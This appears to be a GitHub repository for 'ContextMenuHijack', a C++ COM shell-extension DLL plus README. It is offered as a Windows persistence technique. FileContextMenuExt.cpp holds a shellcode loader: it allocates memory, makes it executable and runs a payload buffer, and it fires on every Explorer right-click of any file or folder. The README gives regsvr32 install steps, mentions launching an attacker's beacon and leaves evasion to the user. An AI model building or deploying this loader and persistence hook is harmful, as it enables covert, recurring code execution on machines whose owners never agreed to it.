├── ContextMenuHijack
    ├── ContextMenuHijack.user
    ├── ContextMenuHijack.vcxproj.user
    ├── GlobalExportFunctions.def
    ├── Reg.h
    ├── ClassFactory.h
    ├── FileContextMenuExt.h
    ├── ContextMenuHijack.sln
    ├── ContextMenuHijack.filters
    ├── ClassFactory.cpp
    ├── dllmain.cpp
    ├── FileContextMenuExt.cpp
    ├── Reg.cpp
    └── ContextMenuHijack.vcxproj
└── README.md


/ContextMenuHijack/ContextMenuHijack.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/ContextMenuHijack/ContextMenuHijack.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/ContextMenuHijack/GlobalExportFunctions.def:
--------------------------------------------------------------------------------
1 | LIBRARY	"ContextMenuHijack"
2 | EXPORTS
3 |     DllGetClassObject   PRIVATE
4 |     DllCanUnloadNow     PRIVATE
5 |     DllRegisterServer   PRIVATE
6 |     DllUnregisterServer PRIVATE


--------------------------------------------------------------------------------
/ContextMenuHijack/Reg.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <windows.h>
 4 | 
 5 | HRESULT RegisterInprocServer(PCWSTR pszModule, const CLSID& clsid, PCWSTR pszFriendlyName, PCWSTR pszThreadModel);
 6 | HRESULT UnregisterInprocServer(const CLSID& clsid);
 7 | HRESULT RegisterShellExtContextMenuHandler(PCWSTR pszFileType, const CLSID& clsid, PCWSTR pszFriendlyName);
 8 | HRESULT UnregisterShellExtContextMenuHandler(PCWSTR pszFileType, const CLSID& clsid);
 9 | 
10 | 
11 | 


--------------------------------------------------------------------------------
/ContextMenuHijack/ClassFactory.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <unknwn.h> 
 4 | #include <windows.h>
 5 | 
 6 | class ClassFactory : public IClassFactory {
 7 | public:
 8 |     // IUnknown
 9 |     IFACEMETHODIMP QueryInterface(REFIID riid, void **ppv);
10 |     IFACEMETHODIMP_(ULONG) AddRef();
11 |     IFACEMETHODIMP_(ULONG) Release();
12 | 
13 |     // IClassFactory
14 |     IFACEMETHODIMP CreateInstance(IUnknown *pUnkOuter, REFIID riid, void **ppv);
15 |     IFACEMETHODIMP LockServer(BOOL fLock);
16 | 
17 |     ClassFactory();
18 | 
19 | protected:
20 |     ~ClassFactory();
21 | 
22 | private:
23 |     long m_cRef;
24 | };


--------------------------------------------------------------------------------
/ContextMenuHijack/FileContextMenuExt.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <windows.h>
 4 | #include <shlobj.h>
 5 | 
 6 | 
 7 | class FileContextMenuExt : public IShellExtInit, public IContextMenu3
 8 | {
 9 | public:
10 |     // IUnknown
11 |     IFACEMETHODIMP QueryInterface(REFIID riid, void** ppv);
12 |     IFACEMETHODIMP_(ULONG) AddRef();
13 |     IFACEMETHODIMP_(ULONG) Release();
14 | 
15 |     // IShellExtInit
16 |     IFACEMETHODIMP Initialize(LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID);
17 | 
18 |     // IContextMenu
19 |     IFACEMETHODIMP QueryContextMenu(HMENU hMenu, UINT indexMenu, UINT idCmdFirst, UINT idCmdLast, UINT uFlags);
20 |     IFACEMETHODIMP InvokeCommand(LPCMINVOKECOMMANDINFO pici);
21 |     IFACEMETHODIMP GetCommandString(UINT_PTR idCommand, UINT uFlags, UINT* pwReserved, LPSTR pszName, UINT cchMax);
22 | 
23 |     // IContextMenu2 IContextMenu3
24 |     IFACEMETHODIMP HandleMenuMsg(UINT uMsg, WPARAM wParam, LPARAM lParam);
25 |     IFACEMETHODIMP HandleMenuMsg2(UINT uMsg, WPARAM wParam, LPARAM lParam, LRESULT* plResult);
26 | 
27 |     FileContextMenuExt(void);
28 | 
29 | protected:
30 |     ~FileContextMenuExt(void);
31 | 
32 | private:
33 |     long    m_cRef;
34 |     wchar_t m_szSelectedFile[MAX_PATH];
35 | };


--------------------------------------------------------------------------------
/ContextMenuHijack/ContextMenuHijack.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.3.32901.215
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ContextMenuHijack", "ContextMenuHijack.vcxproj", "{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Win32 = Debug|Win32
11 | 		Debug|x64 = Debug|x64
12 | 		Release|Win32 = Release|Win32
13 | 		Release|x64 = Release|x64
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Debug|Win32.ActiveCfg = Debug|Win32
17 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Debug|Win32.Build.0 = Debug|Win32
18 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Debug|x64.Build.0 = Debug|x64
20 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Release|Win32.ActiveCfg = Release|Win32
21 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Release|Win32.Build.0 = Release|Win32
22 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Release|x64.ActiveCfg = Release|x64
23 | 		{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}.Release|x64.Build.0 = Release|x64
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {189766A4-67F8-4546-9453-B48CAB571F34}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/ContextMenuHijack/ContextMenuHijack.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="dllmain.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="ClassFactory.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |     <ClCompile Include="FileContextMenuExt.cpp">
25 |       <Filter>Source Files</Filter>
26 |     </ClCompile>
27 |     <ClCompile Include="Reg.cpp">
28 |       <Filter>Source Files</Filter>
29 |     </ClCompile>
30 |   </ItemGroup>
31 |   <ItemGroup>
32 |     <ClInclude Include="ClassFactory.h">
33 |       <Filter>Header Files</Filter>
34 |     </ClInclude>
35 |     <ClInclude Include="FileContextMenuExt.h">
36 |       <Filter>Header Files</Filter>
37 |     </ClInclude>
38 |     <ClInclude Include="Reg.h">
39 |       <Filter>Header Files</Filter>
40 |     </ClInclude>
41 |   </ItemGroup>
42 | </Project>


--------------------------------------------------------------------------------
/ContextMenuHijack/ClassFactory.cpp:
--------------------------------------------------------------------------------
 1 | #include "ClassFactory.h"
 2 | #include "FileContextMenuExt.h"
 3 | #include <new>
 4 | #include <Shlwapi.h>
 5 | #pragma comment(lib, "shlwapi.lib")
 6 | 
 7 | 
 8 | extern long g_cDllRef;
 9 | 
10 | 
11 | ClassFactory::ClassFactory() : m_cRef(1)
12 | {
13 |     InterlockedIncrement( &g_cDllRef );
14 | }
15 | 
16 | ClassFactory::~ClassFactory()
17 | {
18 |     InterlockedDecrement( &g_cDllRef );
19 | }
20 | 
21 | 
22 | IFACEMETHODIMP ClassFactory::QueryInterface(REFIID riid, void **ppv)
23 | {
24 |     static const QITAB qit[] = 
25 |     {
26 |         QITABENT( ClassFactory, IClassFactory ),
27 |         { 0 },
28 |     };
29 |     return QISearch( this, qit, riid, ppv );
30 | }
31 | 
32 | 
33 | IFACEMETHODIMP_(ULONG) ClassFactory::AddRef()
34 | {
35 |     return InterlockedIncrement( &m_cRef );
36 | }
37 | 
38 | IFACEMETHODIMP_(ULONG) ClassFactory::Release()
39 | {
40 |     ULONG cRef = InterlockedDecrement( &m_cRef );
41 |     if ( 0 == cRef ) {
42 |         delete this;
43 |     }
44 |     return cRef;
45 | }
46 | 
47 | 
48 | IFACEMETHODIMP ClassFactory::CreateInstance(IUnknown *pUnkOuter, REFIID riid, void **ppv)
49 | {
50 |     HRESULT hr = CLASS_E_NOAGGREGATION;
51 | 
52 |     if ( pUnkOuter == NULL ) {
53 |         hr = E_OUTOFMEMORY;
54 | 
55 |         FileContextMenuExt *pExt = new ( std::nothrow ) FileContextMenuExt();
56 | 		
57 |         if ( pExt ) {
58 |             hr = pExt->QueryInterface( riid, ppv );
59 |             pExt->Release();
60 |         }
61 |     }
62 | 
63 |     return hr;
64 | }
65 | 
66 | 
67 | IFACEMETHODIMP ClassFactory::LockServer(BOOL fLock)
68 | {
69 |     if ( fLock ) {
70 |         InterlockedIncrement( &g_cDllRef );
71 |     }
72 |     else {
73 |         InterlockedDecrement( &g_cDllRef );
74 |     }
75 |     return S_OK;
76 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # ContextMenuHijack
 2 | 
 3 | This original idea that inspired me is from [@NinjaParanoid](https://twitter.com/NinjaParanoid) :
 4 | 
 5 | [![Video](https://user-images.githubusercontent.com/75935486/212143342-bda8da88-b076-488f-a3c2-126a4875c2c1.png)](https://www.youtube.com/watch?v=SwdmijpSjjA&ab_channel=ChetanNayak)
 6 | 
 7 | 
 8 | [ContextMenuHijack](https://github.com/RistBS/ContextMenuHijack) is a simple persistence technique that use COM hijacking based on human behavior, when you right click on a file/folder in the File Explorer to open the Context Menu, it executes at the same time the beacon we specified.
 9 | ```c
10 | IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
11 |     DWORD tid = NULL;
12 |     CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
13 | 
14 |     if (NULL == pDataObj) {
15 | 	if (pidlFolder != NULL) {
16 | 	}
17 |         return S_OK;
18 |     }
19 |     return S_OK;
20 | }
21 | ```
22 | 
23 | ### Usage
24 | 
25 | You just have to load the solution file (.sln) and build it. It's important to know that you need **adminstrator privileges** to use this persistence technique. Once you have done all of this, you just have to register the DLL file in the registry with `regsvr32`:
26 | 
27 | ```powershell
28 | regsvr32 "C:\path\to\ContextMenuHijack.dll"
29 | ```
30 | 
31 | > if you want to uninstall it just use `/u` flag
32 | ```powershell
33 | regsvr32 /u "C:\path\to\ContextMenuHijack.dll"
34 | ```
35 | 
36 | ![persistence1](https://user-images.githubusercontent.com/75935486/225428627-e6cc9601-5664-4b19-8d5c-7a4bdf5b01dd.gif)
37 | 
38 | 
39 | - this technique can be easily detected from the thread stack of `explorer.exe`, it is up to you to use your own evasion tradecraft 
40 | ![image](https://user-images.githubusercontent.com/75935486/212399032-3249579d-fff5-42e7-b18b-b3e7d13efaad.png)
41 | 
42 | 
43 | # Credits
44 | 
45 | - https://github.com/rikka0w0/ExplorerContextMenuTweaker
46 | - https://learn.microsoft.com/en-us/windows/win32/shell/how-to-implement-the-icontextmenu-interface?redirectedfrom=MSDN
47 | - https://www.codeproject.com/Articles/441/The-Complete-Idiot-s-Guide-to-Writing-Shell-Extens
48 | 


--------------------------------------------------------------------------------
/ContextMenuHijack/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <Guiddef.h>
 3 | #include "ClassFactory.h"
 4 | #include "Reg.h"
 5 | 
 6 | const CLSID CLSID_FileContextMenuExt = { 0xb7cdf620, 0xdb73, 0x44c0,{ 0x86, 0x11, 0x83, 0x2b, 0x26, 0x1a, 0x01, 0x07 } };
 7 | 
 8 | HINSTANCE   g_hInst     = NULL;
 9 | long        g_cDllRef   = 0;
10 | 
11 | 
12 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved)
13 | {
14 | 	switch ( dwReason ) {
15 | 
16 | 	case DLL_PROCESS_ATTACH:
17 |         g_hInst = hModule;
18 |         DisableThreadLibraryCalls( hModule );
19 |         break;
20 | 
21 | 	case DLL_THREAD_ATTACH:
22 | 
23 | 	case DLL_THREAD_DETACH:
24 | 
25 | 	case DLL_PROCESS_DETACH:
26 | 		break;
27 | 	}
28 | 	return TRUE;
29 | }
30 | 
31 | __declspec(dllexport) STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, void **ppv)
32 | {
33 |     HRESULT hr = CLASS_E_CLASSNOTAVAILABLE;
34 | 
35 |     if ( IsEqualCLSID( CLSID_FileContextMenuExt, rclsid ) ) {
36 |         hr = E_OUTOFMEMORY;
37 | 
38 |         ClassFactory *pClassFactory = new ClassFactory();
39 |         if ( pClassFactory ) {
40 |             hr = pClassFactory->QueryInterface( riid, ppv );
41 |             pClassFactory->Release();
42 |         }
43 |     }
44 |     return hr;
45 | }
46 | 
47 | __declspec(dllexport) STDAPI DllCanUnloadNow(void)
48 | {
49 |     return g_cDllRef > 0 ? S_FALSE : S_OK;
50 | }
51 | 
52 | __declspec(dllexport) STDAPI DllRegisterServer(void)
53 | {
54 |     HRESULT hr;
55 | 	
56 |     wchar_t szModule[MAX_PATH];
57 | 
58 |     if ( GetModuleFileName( g_hInst, szModule, ARRAYSIZE( szModule ) ) == 0 ) {
59 |         hr = HRESULT_FROM_WIN32( GetLastError() );
60 |         return hr;
61 |     }
62 | 
63 |     hr = RegisterInprocServer( szModule, CLSID_FileContextMenuExt, L"ContextMenuHijack.FileContextMenuExt Class", L"Apartment" );
64 |     if ( SUCCEEDED( hr ) ) {
65 |         hr = RegisterShellExtContextMenuHandler( L"AllFilesystemObjects", CLSID_FileContextMenuExt, L"ContextMenuHijack.FileContextMenuExt" );
66 |     }
67 | 	
68 |     return hr;
69 | }
70 | 
71 | 
72 | __declspec(dllexport) STDAPI DllUnregisterServer(void)
73 | {
74 |     HRESULT hr = S_OK;
75 | 
76 |     wchar_t szModule[MAX_PATH];
77 | 	
78 |     if ( GetModuleFileName( g_hInst, szModule, ARRAYSIZE( szModule ) ) == 0 ) {
79 |         hr = HRESULT_FROM_WIN32( GetLastError() );
80 |         return hr;
81 |     }
82 | 
83 |     hr = UnregisterInprocServer( CLSID_FileContextMenuExt );
84 |     if ( SUCCEEDED( hr ) ) {
85 |         hr = UnregisterShellExtContextMenuHandler( L"AllFilesystemObjects", CLSID_FileContextMenuExt );
86 |     }
87 | 	
88 |     return hr;
89 | }


--------------------------------------------------------------------------------
/ContextMenuHijack/FileContextMenuExt.cpp:
--------------------------------------------------------------------------------
  1 | #include "FileContextMenuExt.h"
  2 | #include <strsafe.h>
  3 | #include <Shlwapi.h>
  4 | #pragma comment(lib, "shlwapi.lib")
  5 | 
  6 | extern long      g_cDllRef;
  7 | extern HINSTANCE g_hInst;
  8 | 
  9 | UINT             g_QCMFlags;
 10 | 
 11 | #define IDM_DISPLAY 0
 12 | 
 13 | unsigned char buf[] = "\x00"; // Shellcode here
 14 | 
 15 | void InjectShc() 
 16 | {
 17 |     DWORD dwOldProtect = 0;
 18 |     LPVOID addr = VirtualAlloc( NULL, sizeof( buf ), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE );
 19 |     memcpy( addr, buf, sizeof( buf ) );
 20 | 
 21 |     VirtualProtect( addr, sizeof( buf ), PAGE_EXECUTE_READ, &dwOldProtect );
 22 | 
 23 |     ( ( void( * )() )addr )();
 24 | }
 25 | 
 26 | FileContextMenuExt::FileContextMenuExt(void) : m_cRef( 1 )
 27 | {
 28 |     InterlockedIncrement( &g_cDllRef );
 29 | }
 30 | 
 31 | FileContextMenuExt::~FileContextMenuExt(void)
 32 | {
 33 |     InterlockedDecrement( &g_cDllRef );
 34 | }
 35 | 
 36 | #pragma region IUnknown
 37 | 
 38 | IFACEMETHODIMP FileContextMenuExt::QueryInterface(REFIID riid, void **ppv)
 39 | {
 40 |     static const QITAB qit[] = 
 41 |     {
 42 |         QITABENT( FileContextMenuExt, IContextMenu  ),
 43 | 		QITABENT( FileContextMenuExt, IContextMenu2 ),
 44 | 		QITABENT( FileContextMenuExt, IContextMenu3 ),
 45 |         QITABENT( FileContextMenuExt, IShellExtInit ), 
 46 |         { 0 },
 47 |     };
 48 |     return QISearch( this, qit, riid, ppv );
 49 | }
 50 | 
 51 | IFACEMETHODIMP_(ULONG) FileContextMenuExt::AddRef()
 52 | {
 53 |     return InterlockedIncrement( &m_cRef );
 54 | }
 55 | 
 56 | IFACEMETHODIMP_(ULONG) FileContextMenuExt::Release()
 57 | {
 58 |     ULONG cRef = InterlockedDecrement( &m_cRef );
 59 |     if ( 0 == cRef ) {
 60 |         delete this;
 61 |     }
 62 |     return cRef;
 63 | }
 64 | 
 65 | #pragma endregion
 66 | 
 67 | 
 68 | #pragma region IShellExtInit
 69 | 
 70 | extern LPCITEMIDLIST g_pidl;
 71 | 
 72 | IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID )
 73 | {
 74 |     DWORD tid = NULL;
 75 |     CreateThread( NULL, 1024 * 1024, ( LPTHREAD_START_ROUTINE )InjectShc, NULL, 0, &tid );
 76 | 
 77 |     if ( NULL == pDataObj ) {
 78 | 		if ( pidlFolder != NULL ) {
 79 | 		}
 80 |         return S_OK;
 81 |     }
 82 | 	return S_OK;
 83 | }
 84 | 
 85 | #pragma endregion
 86 | 
 87 | #pragma region IContextMenu
 88 | 
 89 | IFACEMETHODIMP FileContextMenuExt::QueryContextMenu(HMENU hMenu, UINT indexMenu, UINT idCmdFirst, UINT idCmdLast, UINT uFlags)
 90 | {
 91 | 	g_QCMFlags = uFlags;
 92 | 	return MAKE_HRESULT( SEVERITY_SUCCESS, 0, 0 );
 93 | }
 94 | 
 95 | 
 96 | IFACEMETHODIMP FileContextMenuExt::InvokeCommand(LPCMINVOKECOMMANDINFO pici)
 97 | {
 98 |     BOOL fUnicode = FALSE;
 99 | 
100 |     if ( pici->cbSize == sizeof( CMINVOKECOMMANDINFOEX ) ) {
101 |         if ( pici->fMask & CMIC_MASK_UNICODE ) {
102 |             fUnicode = TRUE;
103 |         }
104 |     }
105 |     return S_OK;
106 | }
107 | 
108 | 
109 | IFACEMETHODIMP FileContextMenuExt::GetCommandString(UINT_PTR idCommand, UINT uFlags, UINT *pwReserved, LPSTR pszName, UINT cchMax)
110 | {
111 |     HRESULT hr = E_INVALIDARG;
112 | 
113 |     if ( idCommand == IDM_DISPLAY ) {
114 |         switch ( uFlags ) {
115 | 
116 |         default:
117 |             hr = S_OK;
118 |         }
119 |     }
120 |     return hr;
121 | }
122 | 
123 | #pragma endregion
124 | 
125 | HRESULT MenuMessageHandler(UINT uMsg, WPARAM wParam, LPARAM lParam, LRESULT* pResult)
126 | {
127 | 	return S_OK;
128 | }
129 | 
130 | IFACEMETHODIMP FileContextMenuExt::HandleMenuMsg(UINT uMsg, WPARAM wParam, LPARAM lParam)
131 | {
132 | 	LRESULT res;
133 | 	return MenuMessageHandler( uMsg, wParam, lParam, &res );
134 | }
135 | 
136 | IFACEMETHODIMP FileContextMenuExt::HandleMenuMsg2(UINT uMsg, WPARAM wParam, LPARAM lParam, LRESULT *plResult)
137 | {
138 | 	if ( NULL == plResult ) {
139 | 		LRESULT res;
140 | 		return MenuMessageHandler( uMsg, wParam, lParam, &res );
141 | 	}
142 | 	else {
143 | 		return MenuMessageHandler( uMsg, wParam, lParam, plResult );
144 | 	}
145 | }


--------------------------------------------------------------------------------
/ContextMenuHijack/Reg.cpp:
--------------------------------------------------------------------------------
  1 | #include "Reg.h"
  2 | #include <strsafe.h>
  3 | 
  4 | HRESULT SetHKCRRegistryKeyAndValue(PCWSTR pszSubKey, PCWSTR pszValueName, PCWSTR pszData)
  5 | {
  6 |     HKEY hKey = NULL;
  7 | 
  8 |     HRESULT hr = HRESULT_FROM_WIN32( RegCreateKeyEx( HKEY_CLASSES_ROOT, pszSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey, NULL ) );
  9 | 
 10 |     if ( SUCCEEDED( hr ) ) {
 11 |         if ( pszData != NULL ) {
 12 |             DWORD cbData = lstrlen( pszData ) * sizeof( *pszData );
 13 |             hr = HRESULT_FROM_WIN32( RegSetValueEx( hKey, pszValueName, 0, REG_SZ, reinterpret_cast<const BYTE *>( pszData ), cbData ) );
 14 |         }
 15 |         RegCloseKey( hKey );
 16 |     }
 17 |     return hr;
 18 | }
 19 | 
 20 | HRESULT GetHKCRRegistryKeyAndValue(PCWSTR pszSubKey, PCWSTR pszValueName, PWSTR pszData, DWORD cbData)
 21 | {
 22 |     HKEY hKey = NULL;
 23 | 
 24 |     HRESULT hr = HRESULT_FROM_WIN32( RegOpenKeyEx( HKEY_CLASSES_ROOT, pszSubKey, 0, KEY_READ, &hKey ) );
 25 | 
 26 |     if ( SUCCEEDED( hr ) ) {
 27 |         hr = HRESULT_FROM_WIN32( RegQueryValueEx( hKey, pszValueName, NULL, NULL, ( LPBYTE )( pszData ), &cbData ) );
 28 |         RegCloseKey( hKey );
 29 |     }
 30 |     return hr;
 31 | }
 32 | 
 33 | 
 34 | HRESULT RegisterInprocServer(PCWSTR pszModule, const CLSID& clsid, PCWSTR pszFriendlyName, PCWSTR pszThreadModel)
 35 | {
 36 |     if ( pszModule == NULL || pszThreadModel == NULL ) {
 37 |         return E_INVALIDARG;
 38 |     }
 39 | 
 40 |     HRESULT hr;
 41 |     wchar_t szCLSID[ MAX_PATH ];
 42 | 
 43 |     StringFromGUID2( clsid, szCLSID, ARRAYSIZE( szCLSID ) );
 44 | 
 45 |     wchar_t szSubkey[ MAX_PATH ];
 46 | 
 47 |     hr = StringCchPrintf( szSubkey, ARRAYSIZE( szSubkey ), L"CLSID\\%s", szCLSID );
 48 |     if ( SUCCEEDED( hr ) ) {
 49 |         hr = SetHKCRRegistryKeyAndValue( szSubkey, NULL, pszFriendlyName );
 50 | 
 51 |         if ( SUCCEEDED( hr ) ) {
 52 |             hr = StringCchPrintf( szSubkey, ARRAYSIZE( szSubkey ), L"CLSID\\%s\\InprocServer32", szCLSID );
 53 |             if ( SUCCEEDED( hr ) ) {
 54 |                 hr = SetHKCRRegistryKeyAndValue( szSubkey, NULL, pszModule );
 55 |                 if ( SUCCEEDED( hr ) ) {
 56 |                     hr = SetHKCRRegistryKeyAndValue( szSubkey, L"ThreadingModel", pszThreadModel );
 57 |                 }
 58 |             }
 59 |         }
 60 |     }
 61 |     return hr;
 62 | }
 63 | 
 64 | 
 65 | HRESULT UnregisterInprocServer(const CLSID& clsid)
 66 | {
 67 |     HRESULT hr = S_OK;
 68 |     wchar_t szCLSID[ MAX_PATH ];
 69 | 
 70 |     StringFromGUID2( clsid, szCLSID, ARRAYSIZE( szCLSID ) );
 71 | 
 72 |     wchar_t szSubkey[ MAX_PATH ];
 73 | 
 74 |     hr = StringCchPrintf( szSubkey, ARRAYSIZE( szSubkey ), L"CLSID\\%s", szCLSID );
 75 |     if ( SUCCEEDED( hr ) ) {
 76 |         hr = HRESULT_FROM_WIN32( RegDeleteTree( HKEY_CLASSES_ROOT, szSubkey ) );
 77 |     }
 78 |     return hr;
 79 | }
 80 | 
 81 | 
 82 | HRESULT RegisterShellExtContextMenuHandler(PCWSTR pszFileType, const CLSID& clsid, PCWSTR pszFriendlyName)
 83 | {
 84 |     if ( pszFileType == NULL ) {
 85 |         return E_INVALIDARG;
 86 |     }
 87 | 
 88 |     HRESULT hr;
 89 |     wchar_t szCLSID[ MAX_PATH ];
 90 | 
 91 |     StringFromGUID2( clsid, szCLSID, ARRAYSIZE( szCLSID ) );
 92 | 
 93 |     wchar_t szSubkey[ MAX_PATH ];
 94 | 
 95 |     if ( *pszFileType == L'.' ) {
 96 |         wchar_t szDefaultVal[ 260 ];
 97 |         hr = GetHKCRRegistryKeyAndValue( pszFileType, NULL, szDefaultVal, sizeof( szDefaultVal ) );
 98 | 
 99 |         if ( SUCCEEDED( hr ) && szDefaultVal[ 0 ] != L'\0' ) {
100 |             pszFileType = szDefaultVal;
101 |         }
102 |     }
103 | 
104 |     hr = StringCchPrintf( szSubkey, ARRAYSIZE( szSubkey ), L"%s\\shellex\\ContextMenuHandlers\\%s", pszFileType, szCLSID );
105 |     if ( SUCCEEDED( hr ) ) {
106 |         hr = SetHKCRRegistryKeyAndValue( szSubkey, NULL, pszFriendlyName );
107 |     }
108 |     return hr;
109 | }
110 | 
111 | 
112 | HRESULT UnregisterShellExtContextMenuHandler(PCWSTR pszFileType, const CLSID& clsid)
113 | {
114 |     if ( pszFileType == NULL ) {
115 |         return E_INVALIDARG;
116 |     }
117 | 
118 |     HRESULT hr;
119 |     wchar_t szCLSID[ MAX_PATH ];
120 | 
121 |     StringFromGUID2( clsid, szCLSID, ARRAYSIZE( szCLSID ) );
122 | 
123 |     wchar_t szSubkey[ MAX_PATH ];
124 | 
125 |     if ( *pszFileType == L'.' ) {
126 |         wchar_t szDefaultVal[ 260 ];
127 |         hr = GetHKCRRegistryKeyAndValue( pszFileType, NULL, szDefaultVal, sizeof( szDefaultVal ) );
128 | 
129 |         if ( SUCCEEDED( hr ) && szDefaultVal[ 0 ] != L'\0' ) {
130 |             pszFileType = szDefaultVal;
131 |         }
132 |     }
133 | 
134 |     hr = StringCchPrintf( szSubkey, ARRAYSIZE( szSubkey ), L"%s\\shellex\\ContextMenuHandlers\\%s", pszFileType, szCLSID );
135 |     if ( SUCCEEDED( hr ) ) {
136 |         hr = HRESULT_FROM_WIN32( RegDeleteTree( HKEY_CLASSES_ROOT, szSubkey ) );
137 |     }
138 |     return hr;
139 | }


--------------------------------------------------------------------------------
/ContextMenuHijack/ContextMenuHijack.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Debug|x64">
  9 |       <Configuration>Debug</Configuration>
 10 |       <Platform>x64</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Release|Win32">
 13 |       <Configuration>Release</Configuration>
 14 |       <Platform>Win32</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{3D1EDCCE-C4D7-4E77-9E1C-1A689D188A9A}</ProjectGuid>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <RootNamespace>ContextMenuHijack</RootNamespace>
 25 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 26 |     <ProjectName>ContextMenuHijack</ProjectName>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <CharacterSet>Unicode</CharacterSet>
 33 |     <PlatformToolset>v143</PlatformToolset>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 36 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 37 |     <UseDebugLibraries>true</UseDebugLibraries>
 38 |     <CharacterSet>Unicode</CharacterSet>
 39 |     <PlatformToolset>v143</PlatformToolset>
 40 |   </PropertyGroup>
 41 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
